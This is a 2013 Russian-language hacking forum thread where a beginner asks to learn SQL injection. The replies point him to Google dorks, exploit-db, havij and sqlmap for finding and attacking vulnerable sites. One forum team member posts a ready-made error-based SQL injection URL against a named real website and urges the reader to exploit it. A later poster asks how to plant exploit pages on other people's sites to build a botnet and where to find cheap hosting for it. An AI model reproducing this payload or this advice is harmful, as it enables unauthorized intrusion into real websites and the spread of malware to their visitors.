Кто поможет обучиться SQL inj и тд

Тема в разделе "Для новичков", создана пользователем ~FatalError~, 5 янв 2013.

1. ~FatalError~
    ~FatalError~ Guest
    Всем привет,
    обращаюсь к кому не лень. Вот решил обучиться веб хаку и решил естественно с обучения sql inj перечитал пару мануалов понял примерно че как. Но не 1 сайт уязвимый так и не нашел или я просто глупый. Вот у меня два вопроса.
    1. Есть ли какой движок специально напичканный багами для того чтобы на нем изучать?
    2. Есть ли тут люди которые готовы уделить свое время чтобы стать моим учителем хотя-бы на начальном уровне. Через ICQ или skype ну или jabber
    Знаю звучит глупо но всетаки. Спасибо за внимание. Благодарен за ответы.

5 янв 2013
    1 человеку нравится это.
  2. FanOfGun
    FanOfGun Продвинутый
    Симпатии:
    14
    6 янв 2013
    1 человеку нравится это.
  3. Hostgame
    Hostgame Новичок
    Симпатии:
    8
    Читай про гугл дорки. На том же exploit-db.com можно глянуть. Ну и мониторь сам exploit-db.

Например:
    Смотрим Fobuc Guestbook 0.9 - SQL Injection Vulnerability. Если знаком с php или хотя бы знаешь английский, то можно разобрать что уязвим get параметр "category".

Ищиш уязвимые сайты и дальше раскручиваешь havij'ом или sqlmap

20 июн 2013
  4. Хулиган
    Хулиган Команда форума Продвинутый
    Симпатии:
    152
    http://www.xaker.name/forvb/showpost.php?p=179689&postcount=34
    [noparse]http://sea-wave.ru/forum/ajax.php?do=getgroup&groupis=(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(103),CHAR(102),CHAR(81),CHAR(73),CHAR(71),CHAR(85),CHAR(90),CHAR(112)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))[/noparse]
    крути))

21 июн 2013
  5. PSIxxx_yopt
    PSIxxx_yopt Новичок
    Симпатии:
    0
    а forum.hobbi.tv есть уязвимости и вообще,какие они бывают? с php не знаком,английский немного знаю.раз на то пошло задам все вопросы тут,можно ли "подменить" пару страниц на чужом сайте на страницы с эксплоитами? чтоб пополнялся ботнет? это нужен доступ к хостингу? какой есть недорогой хостинг(доллар-4) чтоб подходил для ботнета? цели- форумы с не очень большой популярностью. и как быстро закроют ботнет на бесплатном хостинге?

Спасибо за ответы!

16 июл 2013
Загрузка...